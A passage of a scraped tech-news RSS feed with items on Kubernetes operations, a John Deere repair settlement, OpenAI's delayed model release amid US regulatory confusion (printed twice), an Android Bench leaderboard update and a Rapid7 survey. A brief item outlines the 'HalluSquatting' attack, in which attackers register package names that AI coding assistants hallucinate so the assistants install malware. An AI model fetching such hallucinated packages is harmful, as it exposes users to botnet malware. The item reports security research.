<p>Good upgrade programs need a repeatable process, staging environments that actually look like production, and clear communication so teams know what to expect. The worst upgrade process is the one that relies on heroes to pull it off at the last second. A strong platform turns upgrades into routine.</p>



<h2 class="wp-block-heading">Reliability: Kubernetes helps, but it doesn’t guarantee it</h2>



<p>Yes, Kubernetes restarts crashed containers, reschedules pods and does rolling deployments. But it doesn’t make a bad app reliable.</p>



<p>A poorly coded app will fail on Kubernetes just like anywhere else. Bad readiness or liveness probes? Your app gets traffic too soon. No graceful shutdown? Requests drop during deploy. Forgot pod disruption budgets? The app goes down during node maintenance. A flaky dependency? It will cascade through your services even if all your pods look healthy.</p>



<p>The mature approach is setting service-level objectives and making reliability a product of both platform and engineering. Cluster health isn’t user experience. That green status page can hide a lot of pain.</p>



<h2 class="wp-block-heading">The platform team is a product team</h2>



<p>Here’s the biggest lesson I’ve picked up is that running Kubernetes at enterprise scale isn’t really about the tech. One cluster? Maybe one expert can handle that. But for a full enterprise platform, you need a product mindset. The platform team serves customers such as engineers, security, compliance, finance and business. Everyone wants something a bit different.</p>



<p>Developers want speed and reliability. Security wants oversight. Finance wants transparency. Compliance wants proof. Ops wants predictability. The business wants all of those.</p>



<p>The platform team has to pull those threads together with APIs, docs, dashboards, paved roads, support and feedback. That also means saying “no” to the unique snowflake patterns that create chaos later. Kubernetes is powerful. But it doesn’t replace organizational discipline. That’s still on the shoulders of engineering leaders. The real challenge at enterprise scale isn’t memorizing every API object. It’s building a system where any team can ship safely without needing to be Kubernetes experts themselves.</p>



<p>When you reach that point, Kubernetes stops being just a cluster. It becomes your platform.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.infoworld.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[John Deere Agrees To 10-Year Right-To-Repair Deal In FTC Antitrust Lawsuit]]></title>
<description><![CDATA[John Deere has agreed to a 10-year FTC-supervised right-to-repair settlement requiring it to provide farmers and independent repair shops with the same repair resources available to authorized dealers. The deal resolves antitrust claims from the FTC and five states alleging Deere monopolized equi...]]></description>
<link>https://tsecurity.de/de/3655539/it-security-nachrichten/john-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655539/it-security-nachrichten/john-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit/</guid>
<pubDate>Thu, 09 Jul 2026 00:23:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[John Deere has agreed to a 10-year FTC-supervised right-to-repair settlement requiring it to provide farmers and independent repair shops with the same repair resources available to authorized dealers. The deal resolves antitrust claims from the FTC and five states alleging Deere monopolized equipment repair services, contributing to higher costs and delays for farmers. Wired reports: The full statement (PDF) lays out obligations for John Deere's repair services, requiring the company to give farmers and third-party repair shops access to the same equipment and repair resources it provides to official John Deere dealers. This includes software capabilities, such as reading and resetting codes and pairing with other software, which customers have long had limited access to, creating delays when diagnosing equipment problems. Delayed fixes can mean delayed harvests, which many farmers saw as a fundamental threat to their livelihoods.
 
Under the agreement, John Deere will be required to provide this level of access, equipment, and services for the next 10 years, monitored by the FTC. [...] John Deere has maintained that it already has robust repair resources for its customers, including service manuals and diagnostic equipment. In John Deere's press release, the company says the settlement is in line with what it has been doing all along, saying that "the agreement reinforces Deere's continued innovation toward more flexible repair options, emphasizing increased access and transparency for customers. It formalizes Deere's ongoing commitment to expanding access to diagnostic and repair tools."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=John+Deere+Agrees+To+10-Year+Right-To-Repair+Deal+In+FTC+Antitrust+Lawsuit%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F08%2F2049231%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F08%2F2049231%2Fjohn-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/08/2049231/john-deere-agrees-to-10-year-right-to-repair-deal-in-ftc-antitrust-lawsuit?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI to release delayed models Thursday amidst a sea of regulatory confusion]]></title>
<description><![CDATA[As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.



Initially, the US gov...]]></description>
<link>https://tsecurity.de/de/3655253/ai-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655253/ai-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</guid>
<pubDate>Wed, 08 Jul 2026 21:03:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.</p>



<p>Initially, the US government said that it was asking OpenAI to <a href="https://www.infoworld.com/article/4190089/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model-2.html" target="_blank">limit access to its top models</a>, including the three releasing Thursday, to a short list of companies. OpenAI seemingly agreed and held back their general availability.</p>



<p>But on Wednesday, OpenAI reversed its position, with <a href="https://x.com/OpenAI/status/2074704958419792299?s=20" target="_blank" rel="noreferrer noopener">a statement on X</a> saying simply: “GPT-5.6 Sol, along with Terra and Luna, will launch publicly this Thursday. We’re expanding preview access globally now.” No details were released about the extent of the expansion.</p>



<p>Then the White House issued a statement, a copy of which it emailed to <em>InfoWorld</em>, saying that the US government “did not give OpenAI a ‘green light,’ approval or clearance to release its models. No such permission is required or granted. The Administration does not provide approvals for private companies to release AI models – decisions on timing and scope of releases rest entirely with the companies.”</p>



<p>The statement then quoted from the <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/" target="_blank" rel="noreferrer noopener">June 2 White House executive order</a> that said, “nothing in this section shall be construed to authorize the creation of a mandatory governmental licensing, preclearance, or permitting requirement for the development, publication, release, or distribution of new AI models, including frontier models.” It also said, “any testing or meetings with government experts is voluntary. Participation is not required to release a model.”</p>



<p>Yet last month, the US Commerce Department weighed in <a href="https://www.cio.com/article/4186429/anthropic-fable-dispute-suggests-export-no-longer-means-what-it-used-to.html" target="_blank">on how Anthropic’s models can be distributed</a>. </p>



<h2 class="wp-block-heading">The ‘worst of both worlds’</h2>



<p><a href="https://www.linkedin.com/in/lewiscarhart/" target="_blank" rel="noreferrer noopener">Lewis Carhart</a>, CEO of software development firm Comp AI, said the statement is frustrating for IT executives on multiple fronts. </p>



<p>“Think about what that [White House statement] means. OpenAI stationed engineers in Washington for weeks, submitted to government testing, staggered its launch at the government’s request. And the official position is that none of that was required,” Carhart said. “We now have a de facto licensing regime that legally doesn’t exist. There’s no statute, no appeal process, no published criteria. Just [the US Department of] Commerce deciding model by model what ships and when.”</p>



<p>That’s the worst of both worlds, he noted: “All the friction of regulation with none of the predictability. Compliance people have a name for this – it’s an audit with no framework. And the precedent is now locked in for both frontier labs: if you build at the frontier, your launch calendar runs through Washington whether the law says so or not.”</p>



<p>Carhart argued that this regulatory reality should be of extreme concern to enterprise IT executives, given it indicates that model availability is now “a regulatory variable” not driven by the vendor roadmap.</p>



<p>“Anthropic’s most advanced models disappeared from the market for three weeks in June. It was not because of an outage, not because of a pricing change. It was because of an export control directive,” he pointed out. “If your AI architecture assumes the model you deployed today is available tomorrow, that assumption is now demonstrably false. Multi-model resilience just went from nice to have to a board-level risk item.”</p>



<p>It also offers an opportunity, given that a model that cleared government security testing is a model that auditors and boards sign off on faster. “Government review is quietly becoming a procurement asset,” he observed. “The CIOs who win here are the ones who treat ‘regulatory posture of the model itself’ as a line item in vendor risk assessments – most risk teams are still only looking at the provider’s SOC 2 attestation.”</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, agreed with Carhart and described the overall back-and-forth as “a bit of pageantry. OpenAI needs its model to look as powerful, potentially dangerous, as Anthropic’s so it can be a contender to be at the absolute frontier. It also helps to burnish OpenAI’s PR efforts to look more responsible than it has in the past.”</p>



<p>Furthermore, he added, “tech CEOs are acutely aware that flattery towards this administration could keep regulators or the threat of regulation at bay.”</p>



<h2 class="wp-block-heading">Criteria not clear</h2>



<p><a href="https://www.infotech.com/profiles/brian-jackson" target="_blank" rel="noreferrer noopener">Brian Jackson</a>, a principal research director at Info-Tech Research Group, echoed the political concerns. </p>



<p>“What’s still not clear is the actual criteria being used to deem the models safe for release. The government has said that it’s concerned about cybersecurity risk as well as the risk of AI being used to develop biological weapons,” he said. “But so long as the actual release criteria lack transparency, there will be some perception that the evaluation could be politically motivated.”</p>



<p>Jackson said that one, presumably unintended, result of the US government’s efforts to control AI rollouts is that it is making companies look far more seriously at using non-US vendors for AI strategies. </p>



<p>“Organizations are looking for alternatives to the private US-based cloud-delivered frontier models. That’s so they can maintain control over their AI supply chain,” he said. “Chinese open source models are one option that’s available, but there are other options too, from Canada and Europe. Companies can either set up AI access through other APIs not connected to US-based AI providers, or download open-source models to run locally.”</p>



<p>He noted that the added US regulatory risk means that some organizations will avoid becoming entrenched within OpenAI’s and Anthropic’s interfaces, where there’s no option to swap out the LLMs for an alternative.</p>



<h2 class="wp-block-heading">Impacts enterprise AI strategy</h2>



<p><a href="https://zenity.io/authors/rock-lambros" target="_blank" rel="noreferrer noopener">Rock Lambros</a>, director of AI standards and governance at AI agent vendor Zenity, shared the frustration that little to no actionable compliance data is being released. </p>



<p>“Nobody outside a closed room can tell you what standard [the model] passed because it was never written down. For two weeks, [US government officials] kept a model out of defenders’ hands that’s better at guarding your network than breaking into anyone else’s,” Lambros said. “Call that a security review if it helps you sleep better. But it reads to me like a bouncer working a velvet rope nobody hired him to run, waving people through today because he’s in a better mood than he was a couple of weeks ago.”</p>



<p>This unpredictability is likely to have impacts on AI strategy far beyond traditional compliance concerns, Lambros said.</p>



<p>“We’ve built way too much operational reliance on these models to hang it on a review with no rulebook,” he said, pointing out that hospitals, pipelines, banks and water utilities are relying on frontier AI whose availability “can swing from ‘on’ to ‘off’ to ‘on’ with no notice, no appeal, and no published standard behind any of it.”</p>



<p>“You can’t run critical infrastructure on a tool that runs fine Friday and is offline by Monday because an approval process nobody can see reached a verdict nobody can predict,” Lambros said. “That is a supply chain risk with a government hand on the switch, and almost nobody has priced it into a continuity plan.”</p>



<p>To protect themselves, companies need to adjust their expectations. “Treat model availability like any single point of failure you don’t own by standing up a fallback you’ve tested, getting a continuity clause in your contract, and drilling for the blackout, because ‘the government backed off this time’ is not a plan,” he advised.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI to release delayed models Thursday amidst a sea of regulatory confusion]]></title>
<description><![CDATA[As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.



Initially, the US gov...]]></description>
<link>https://tsecurity.de/de/3655243/it-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655243/it-nachrichten/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion/</guid>
<pubDate>Wed, 08 Jul 2026 21:02:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.</p>



<p>Initially, the US government said that it was asking OpenAI to <a href="https://www.infoworld.com/article/4190089/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model-2.html" target="_blank">limit access to its top models</a>, including the three releasing Thursday, to a short list of companies. OpenAI seemingly agreed and held back their general availability.</p>



<p>But on Wednesday, OpenAI reversed its position, with <a href="https://x.com/OpenAI/status/2074704958419792299?s=20" target="_blank" rel="noreferrer noopener">a statement on X</a> saying simply: “GPT-5.6 Sol, along with Terra and Luna, will launch publicly this Thursday. We’re expanding preview access globally now.” No details were released about the extent of the expansion.</p>



<p>Then the White House issued a statement, a copy of which it emailed to <em>InfoWorld</em>, saying that the US government “did not give OpenAI a ‘green light,’ approval or clearance to release its models. No such permission is required or granted. The Administration does not provide approvals for private companies to release AI models – decisions on timing and scope of releases rest entirely with the companies.”</p>



<p>The statement then quoted from the <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/" target="_blank" rel="noreferrer noopener">June 2 White House executive order</a> that said, “nothing in this section shall be construed to authorize the creation of a mandatory governmental licensing, preclearance, or permitting requirement for the development, publication, release, or distribution of new AI models, including frontier models.” It also said, “any testing or meetings with government experts is voluntary. Participation is not required to release a model.”</p>



<p>Yet last month, the US Commerce Department weighed in <a href="https://www.cio.com/article/4186429/anthropic-fable-dispute-suggests-export-no-longer-means-what-it-used-to.html" target="_blank">on how Anthropic’s models can be distributed</a>. </p>



<h2 class="wp-block-heading">The ‘worst of both worlds’</h2>



<p><a href="https://www.linkedin.com/in/lewiscarhart/" target="_blank" rel="noreferrer noopener">Lewis Carhart</a>, CEO of software development firm Comp AI, said the statement is frustrating for IT executives on multiple fronts. </p>



<p>“Think about what that [White House statement] means. OpenAI stationed engineers in Washington for weeks, submitted to government testing, staggered its launch at the government’s request. And the official position is that none of that was required,” Carhart said. “We now have a de facto licensing regime that legally doesn’t exist. There’s no statute, no appeal process, no published criteria. Just [the US Department of] Commerce deciding model by model what ships and when.”</p>



<p>That’s the worst of both worlds, he noted: “All the friction of regulation with none of the predictability. Compliance people have a name for this – it’s an audit with no framework. And the precedent is now locked in for both frontier labs: if you build at the frontier, your launch calendar runs through Washington whether the law says so or not.”</p>



<p>Carhart argued that this regulatory reality should be of extreme concern to enterprise IT executives, given it indicates that model availability is now “a regulatory variable” not driven by the vendor roadmap.</p>



<p>“Anthropic’s most advanced models disappeared from the market for three weeks in June. It was not because of an outage, not because of a pricing change. It was because of an export control directive,” he pointed out. “If your AI architecture assumes the model you deployed today is available tomorrow, that assumption is now demonstrably false. Multi-model resilience just went from nice to have to a board-level risk item.”</p>



<p>It also offers an opportunity, given that a model that cleared government security testing is a model that auditors and boards sign off on faster. “Government review is quietly becoming a procurement asset,” he observed. “The CIOs who win here are the ones who treat ‘regulatory posture of the model itself’ as a line item in vendor risk assessments – most risk teams are still only looking at the provider’s SOC 2 attestation.”</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, agreed with Carhart and described the overall back-and-forth as “a bit of pageantry. OpenAI needs its model to look as powerful, potentially dangerous, as Anthropic’s so it can be a contender to be at the absolute frontier. It also helps to burnish OpenAI’s PR efforts to look more responsible than it has in the past.”</p>



<p>Furthermore, he added, “tech CEOs are acutely aware that flattery towards this administration could keep regulators or the threat of regulation at bay.”</p>



<h2 class="wp-block-heading">Criteria not clear</h2>



<p><a href="https://www.infotech.com/profiles/brian-jackson" target="_blank" rel="noreferrer noopener">Brian Jackson</a>, a principal research director at Info-Tech Research Group, echoed the political concerns. </p>



<p>“What’s still not clear is the actual criteria being used to deem the models safe for release. The government has said that it’s concerned about cybersecurity risk as well as the risk of AI being used to develop biological weapons,” he said. “But so long as the actual release criteria lack transparency, there will be some perception that the evaluation could be politically motivated.”</p>



<p>Jackson said that one, presumably unintended, result of the US government’s efforts to control AI rollouts is that it is making companies look far more seriously at using non-US vendors for AI strategies. </p>



<p>“Organizations are looking for alternatives to the private US-based cloud-delivered frontier models. That’s so they can maintain control over their AI supply chain,” he said. “Chinese open source models are one option that’s available, but there are other options too, from Canada and Europe. Companies can either set up AI access through other APIs not connected to US-based AI providers, or download open-source models to run locally.”</p>



<p>He noted that the added US regulatory risk means that some organizations will avoid becoming entrenched within OpenAI’s and Anthropic’s interfaces, where there’s no option to swap out the LLMs for an alternative.</p>



<h2 class="wp-block-heading">Impacts enterprise AI strategy</h2>



<p><a href="https://zenity.io/authors/rock-lambros" target="_blank" rel="noreferrer noopener">Rock Lambros</a>, director of AI standards and governance at AI agent vendor Zenity, shared the frustration that little to no actionable compliance data is being released. </p>



<p>“Nobody outside a closed room can tell you what standard [the model] passed because it was never written down. For two weeks, [US government officials] kept a model out of defenders’ hands that’s better at guarding your network than breaking into anyone else’s,” Lambros said. “Call that a security review if it helps you sleep better. But it reads to me like a bouncer working a velvet rope nobody hired him to run, waving people through today because he’s in a better mood than he was a couple of weeks ago.”</p>



<p>This unpredictability is likely to have impacts on AI strategy far beyond traditional compliance concerns, Lambros said.</p>



<p>“We’ve built way too much operational reliance on these models to hang it on a review with no rulebook,” he said, pointing out that hospitals, pipelines, banks and water utilities are relying on frontier AI whose availability “can swing from ‘on’ to ‘off’ to ‘on’ with no notice, no appeal, and no published standard behind any of it.”</p>



<p>“You can’t run critical infrastructure on a tool that runs fine Friday and is offline by Monday because an approval process nobody can see reached a verdict nobody can predict,” Lambros said. “That is a supply chain risk with a government hand on the switch, and almost nobody has priced it into a continuity plan.”</p>



<p>To protect themselves, companies need to adjust their expectations. “Treat model availability like any single point of failure you don’t own by standing up a fallback you’ve tested, getting a continuity clause in your contract, and drilling for the blackout, because ‘the government backed off this time’ is not a plan,” he advised.</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Evolving how LLMs are measured for Android: the next era of Android Bench]]></title>
<description><![CDATA[Posted by Zoe Lopez-Latorre, Senior Developer Relations Engineer, AndroidBack in March, we introduced Android Bench—our LLM leaderboard for real-world Android development tasks. Our goal was to provide transparency around model capabilities in Android development and to encourage model improvemen...]]></description>
<link>https://tsecurity.de/de/3655018/android-tipps/evolving-how-llms-are-measured-for-android-the-next-era-of-android-bench/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655018/android-tipps/evolving-how-llms-are-measured-for-android-the-next-era-of-android-bench/</guid>
<pubDate>Wed, 08 Jul 2026 19:27:23 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCAy4lIbOAOrygTMaHZB8q4NarDrLRsqALfsmer5urQX7G_MaRDTw51uMh77Ks2knIuWM-zaEel63Dk2IlCVGD9IxLFy0B68KxwxsvDZzVDaEWaM4Bg8xJYinunaXS_fonxBw7-R4_qSplI4MJU7RDDaYlbq7nRXZoht5lFZVC7ErLEWHdWA6B2KgJvrk/s2469/Bench%20July%20releas%20V01_Meta.png">
<div><i>Posted by Zoe Lopez-Latorre, Senior Developer Relations Engineer, Android</i></div><div><i><br></i><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49z_u9zPMjp-zyQ1yIpzLgDumtzUwZoprtIgPXv_kpF05e87KklDEguaKSJVhvV8dZJ7aVr98p-MG3FR4Sk37rcYTS91J3ADUQot-c-xnOuyIZ411VO4Hp43Yp7V_TwF6zO6RmAJpw51ZHPGbHfOwZxWgQ62SQeXblULcSc0RjMcZbLHGUZGgHzU6pEo/s8583/Bench%20July%20releas%20V01_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49z_u9zPMjp-zyQ1yIpzLgDumtzUwZoprtIgPXv_kpF05e87KklDEguaKSJVhvV8dZJ7aVr98p-MG3FR4Sk37rcYTS91J3ADUQot-c-xnOuyIZ411VO4Hp43Yp7V_TwF6zO6RmAJpw51ZHPGbHfOwZxWgQ62SQeXblULcSc0RjMcZbLHGUZGgHzU6pEo/s1600/Bench%20July%20releas%20V01_Blog.png"></a></div><br><i><br></i><p>Back in March, we introduced <a href="http://d.android.com/bench">Android Bench</a>—our LLM leaderboard for real-world Android development tasks. Our goal was to provide transparency around model capabilities in Android development and to encourage model improvements, to give you more helpful AI options for your everyday workflow. Since then, we have enhanced the benchmark based on your feedback, including evaluating <a href="https://x.com/AndroidDev/status/2064482677500080549">open-weight models</a> and adding cost and efficiency dimensions to the leaderboard.</p>

<p>But AI capabilities are ever-evolving, and measurement needs to follow suit. As part of our July release, we have adopted the <a href="https://www.harborframework.com/">Harbor framework</a>, which includes an updated version of the benchmarking agent used to evaluate models.</p>

Along with this change to our evaluation, in this July release we’re adding 8 new models (<b>Claude Fable 5, Claude Sonnet 5, Claude Opus 4.8, GLM 5.2, Kimi K2.7 Code, MiniMax M3, Qwen 3.7 Plus and Qwen 3.7 Max</b>) to the leaderboard. We’re also sharing opportunities for you, the Android developer community, to contribute to the benchmark. 

<h2>Upgrading our methodology with the Harbor framework</h2>

<p>When we designed Android Bench, we anchored our methodology on leading industry standards available at the time. We used mini-swe-agent v1, a general-purpose benchmarking agent, and adapted it to the nuances of Android development to provide a baseline measurement for the capabilities of models for common Android development tasks.</p>

<p>To continue providing you with state-of-the-art evaluations that accurately measure the latest model capabilities on Android development, we are standardizing our benchmark to the <a href="https://www.harborframework.com/">Harbor framework</a>. Harbor defines standards and integrations that make it easy for anyone to run the benchmark, evaluate their preferred set-up, or share results – providing you with additional transparency and visibility.</p>

<p>This upgrade enables us to more rigorously evaluate models and their capabilities, and we re-ran the benchmark on all models to establish an updated baseline. This means there is a minor shift in scoring, but you will still be able to view historical scores within <a href="http://d.android.com/bench/archive">the archive</a> on our website.</p>

<p>We want to ensure Android Bench is helpful for you, so we will continuously update it as our evaluations and the industry mature.</p>

<h2>Expanding the leaderboard with 8 new models</h2>

<p>As part of our commitment to keeping the leaderboard fresh, we have added Claude Fable 5, Claude Sonnet 5, Claude Opus 4.8, GLM 5.2, Kimi K2.7 Code, MiniMax M3, Qwen 3.7 Plus and Qwen 3.7 Max to the Android Bench leaderboard.</p>

<p>You will see that <b>Claude Fable 5</b> is at the top of the leaderboard with a score of 84.5, followed by <b>GPT 5.5</b> with 80.2, with <b>Claude Sonnet 5</b> in 3rd with a score of 76.2.</p>

<p>When just comparing Open-weight models,<b> GLM 5.2</b> is at the top with 72.2, followed by <b>Kimi K2.7 Code</b> with a score of 70.4.</p>

<p>You can check out model performance and efficiency metrics on the updated leaderboard to see how these new and previous models navigate Android-specific challenges like Jetpack Compose migrations, wearable networking, and platform API updates.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCbY3Td_I5gR8bC4uFSBTe4Sl-XuArNNdFU-27JP6-kwHycXt9AMpWfkLqjUIK37Zw18Tel6a7yOS9x0L_NabxBgYd9KIJKZ6dTLl6VxxJI4M7Zstqj12wvOFtF8LjnYrCIWnhCDdeGsgpQvFpFX8VOoSO0dFJcOW_gRc6eX7mXDq80sOwQAlQWNhlQg/s1999/image1.png"><img border="0" data-original-height="890" data-original-width="1999" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCbY3Td_I5gR8bC4uFSBTe4Sl-XuArNNdFU-27JP6-kwHycXt9AMpWfkLqjUIK37Zw18Tel6a7yOS9x0L_NabxBgYd9KIJKZ6dTLl6VxxJI4M7Zstqj12wvOFtF8LjnYrCIWnhCDdeGsgpQvFpFX8VOoSO0dFJcOW_gRc6eX7mXDq80sOwQAlQWNhlQg/s1600/image1.png"></a></div>

<h2>Opening Android Bench to community contributions</h2>

<p>From the beginning, we’ve valued an open and transparent approach, which is why we made our original methodology and test harness publicly available on GitHub. You’ve asked for a way to provide feedback on our dataset, so now we’re taking collaboration a step further by giving you, the Android developer community, a chance to shape Android Bench.</p>

<p>Starting today, you can contribute to Android Bench in two ways:</p>

<ul>
    <li>Design and <a href="https://github.com/android-bench/community-dataset">submit your own Android development tasks</a> to evaluate how models handle the scenarios that matter to you.</li>
    <li><a href="https://github.com/android-bench/community-results">Run and share benchmark evaluations</a> firsthand, testing your preferred models against our dataset or your own custom tasks.</li>
</ul>

<p>We will be reviewing the submitted tasks and will be assessing if they get added to the benchmark. We hope to build a benchmark that truly reflects the diverse, day-to-day realities of the global Android developer community.</p>

<h2>Looking ahead</h2>

<p>With more and more options for agentic development, maintaining a cutting-edge benchmark ensures that the AI assistance you rely on keeps getting smarter, more helpful, and more effective. Head over to our <a href="https://github.com/android-bench/android-bench">GitHub repository</a> to check out the tasks. We invite you to submit a task to our team for review, and you can check out <a href="https://hub.harborframework.com/datasets/android-bench/android-bench/latest">Harbor Hub</a> to explore the dataset or submit evaluations.</p>

<p>As always, you can find the <a href="http://d.android.com/bench">updated leaderboard</a>, or read the <a href="http://d.android.com/bench/methodology">methodology</a> on our website.</p>
  <span>
    Android Bench, LLM leaderboard, Harbor framework, Android development, Claude Fable 5, GPT 5.5, Claude Sonnet 5, GLM 5.2, Kimi K2.7 Code, MiniMax M3, Qwen 3.7 Plus, Qwen 3.7 Max, AI benchmarking, Jetpack Compose migration, wearable networking, mobile AI agent, Zoe Lopez-Latorre, model evaluation, open-weight models, developer community contributions.
</span>
  </div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New HalluSquatting Attack Could Trick AI Coding Assistants Into Installing Botnet Malware]]></title>
<description><![CDATA[AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist.

New research, which its authors call HalluSquatting, turns that habit into an attack: work out the fake names an AI reli...]]></description>
<link>https://tsecurity.de/de/3654883/it-security-nachrichten/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654883/it-security-nachrichten/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/</guid>
<pubDate>Wed, 08 Jul 2026 18:27:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist.

New research, which its authors call HalluSquatting, turns that habit into an attack: work out the fake names an AI reliably invents, register them first, and wait for the assistant to fetch your trap on a user's]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Teams Are Ready To Become More Preemptive. What’s Holding Them Back?]]></title>
<description><![CDATA[The shift toward preemptive security is underway, but most organizations are still navigating the realities of limited resources, fragmented tools, and emerging AI risk. At Rapid7’s recent Global Security Summit, we surveyed attendees to better understand where security leaders and practitioners ...]]></description>
<link>https://tsecurity.de/de/3654445/it-security-nachrichten/security-teams-are-ready-to-become-more-preemptive-whats-holding-them-back/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654445/it-security-nachrichten/security-teams-are-ready-to-become-more-preemptive-whats-holding-them-back/</guid>
<pubDate>Wed, 08 Jul 2026 15:23:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The shift toward preemptive security is underway, but most organizations are still navigating the realities of limited resources, fragmented tools, and emerging AI risk. At Rapid7’s recent </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>Global Security Summit</span></a><span>, we surveyed attendees to better understand where security leaders and practitioners stand today, what is shaping their priorities, and what they need to move forward. Their responses offer a candid view into the current state of security operations: ambitious, increasingly AI-aware, and ready for change, but still working through the practical challenges of getting there.</span></p><p><span>For many teams, the direction is clear: security needs to become more proactive, more connected, and more resilient. Attackers are moving quickly, environments are expanding, and teams are under pressure to reduce risk before it turns into business disruption. But the survey results show that most organizations are still somewhere in the middle of that journey.</span></p><h2>Where organizations are today</h2><p><span>One of the clearest findings is that security operations are increasingly collaborative. According to the survey, 57% of respondents operate in a hybrid internal and MDR model. That reflects a reality many teams know well: internal expertise remains essential, but external support can help extend coverage, add specialist knowledge, and support faster response when internal resources are stretched.</span></p><p><span>This hybrid model also speaks to the complexity security teams are managing. Modern environments span cloud, identity, endpoints, applications, third parties, and expanding attack surfaces. Keeping watch across all of it requires more than tooling alone. It requires the right mix of people, process, visibility, and support.</span></p><p><span>At the same time, many organizations are still working to connect the dots across their security ecosystem. Two-thirds of 